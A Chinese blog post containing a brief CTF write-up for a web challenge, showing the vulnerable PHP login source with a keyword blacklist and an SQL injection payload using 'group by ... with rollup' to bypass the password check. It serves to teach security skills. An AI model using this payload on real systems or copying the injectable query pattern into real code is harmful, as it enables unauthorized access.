因缺思汀的绕过

最新推荐文章于 2019-08-19 17:08:35 发布
最新推荐文章于 2019-08-19 17:08:35 发布
阅读量1.9k 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33020901/article/details/56496164
版权

阅读源码知道 保证查找内容可控就可以进行绕过

类似 union select 1,2
然后密码填写 2


题目源码

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
	echo '<form action="" method="post">'."<br/>";
	echo '<input name="uname" type="text"/>'."<br/>";
	echo '<input name="pwd" type="text"/>'."<br/>";
	echo '<input type="submit" />'."<br/>";
	echo '</form>'."<br/>";
	echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "水可载舟,亦可赛艇!";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
	die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
	print "一颗赛艇!";
}
mysql_close($con);
?>

最后语句,大致是    }'  ||  group by uname limit 2 offset 1 with rollup

PD_3569
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一些因缺思汀的小实验1
08-03
一些因缺思汀的小实验不同代码实现方式效率上的差异TEST1 使用new和delete的常数开销与Buffer开销的对比TEST2 使用指针跳转和数组跳转的常数对
CTF解题笔记(1)
热门推荐
CODING...
01-09 1万+
因缺思汀绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
实验吧-因缺思汀绕过WriteUp
焚卷觅光的博客
07-22 3050
实验吧-因缺思汀绕过WriteUp题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt--> 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过。! 这里有三层限制0X00在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如
实验吧 因缺思汀绕过 By Assassin(with rollup统计)
Assassin
01-29 7228
这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!<?php error_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
CTF-实验吧因缺思汀绕过
才不是小弱鸡的博客
05-07 473
web题嘛,第一步肯定是看源码。f12后发现这样一些奇怪的东东接下来肯定是打开这个文件嘛打开后就看到了php源码啦(是不是很开心!)分析一下源码可以看到这里过滤了一些sql语句(嗯,这些东西接下来不能用了)这里的意思大概是选择操作的数据库为db(数据库看不到QAQ)然后将咱们输入的uname在数据库查询uname和key,再将key和咱们输入的pwd比对,相等就打印flag。然后就要用一个注入的小...
实验吧-因缺思汀绕过
一个安全研究员
07-21 489
如题
安恒周周练西湖论剑版web美男子题:巧用group by with rollup
young9222的博客
04-08 2624
安恒周周练西湖论剑版web美男子题:巧用group by with rollup 2019年4月8日15:49:30 ###源码:### <?php include ‘global.php’; function AttackFilter($StrKey,$StrValue,$ArrReq){ if(is_array($StrValue)) { $S...
C++进行网络开发需要的工具
hnkfwhw的博客
10-20 867
Module01 - Linux系统基础 由于本系列课程基于Linux(或UNIX),熟悉Linux操作系统是必要的前提。 该模块的课程包含以下方面的内容: 常用Unix/Linux命令 熟悉文件管理、文本处理、进程管理、网络、系统管理等各个方面大约100个常用的命令。 深入了解bash 了解Linux默认shell: bash 的语法、命令执行、I/O重定向、任务控制等。 正...
ctf中的php代码审计
qq_40273198的博客
05-04 2866
ctf题时,遇到审计题时可能会遇到,翻翻记录可以很快的找到脑洞。1.PHP$flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'ctf{xxx}'; }...
结合order by 解CTF某题
aiquan9342的博客
10-21 194
真tmd不容易 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" typ...
CTF---Web入门第六题 因缺思汀绕过
weixin_34370347的博客
11-08 161
因缺思汀绕过分值:20 来源: pcat 难度:中 参与人数:6479人 Get Flag:2002人 答题人数:2197人 解题通过率:91% 访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQ...
实验吧 因缺思汀绕过
windseraph2的博客
05-13 497
解题连接http://ctf5.shiyanbar.com/web/pcat/index.php  查看源代码   action="" method="post"><input name="uname" type="text"/><input name="pwd" type="text"/><input type="submit" /> 查
实验吧 - 因缺思汀绕过
多崎巡礼的博客
10-10 236
题目地址:http://www.shiyanbar.com/ctf/1940 审计网页代码,发现有一个注释:&lt;!--source: source.txt--&gt; 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过   &lt;?php error_reporting(0); if (!isset($_POST['uname']) || !isset...
因缺思汀绕过——实验吧
weixin_33915554的博客
07-12 108
因缺思汀绕过分值:20 来源:pcat 难度:中 参与人数:9534人 Get Flag:3087人 答题人数:3370人 解题通过率:92% 访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码, 请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。 web...
CTF题库>因缺思汀绕过
qq_42777804的博客
08-19 435
访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入,XSS等相关知识。涉及方向较多。此题主要涉及源码审计,MySQL相关的知识。 flag格式 CTF{} 我们访问网站之后 出现这个 我们要先进行查看源码 发现了 sourc...
暑期练习web6:因缺思汀绕过(实验吧) 代码审计 with rollup
qq_41618162的博客
08-13 343
题目的hint:主要涉及代码审计和mysql方面 解题链接: http://ctf5.shiyanbar.com/web/pcat/index.php 拿到题目,好吧,这题我完全没辙。。。, 查看一下源码: 这里结合了一下@GETF对源码的注释,对代码进行了一定的解读 &amp;amp;lt;?php error_reporting(0); if (!isset($_POST['uname'])...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值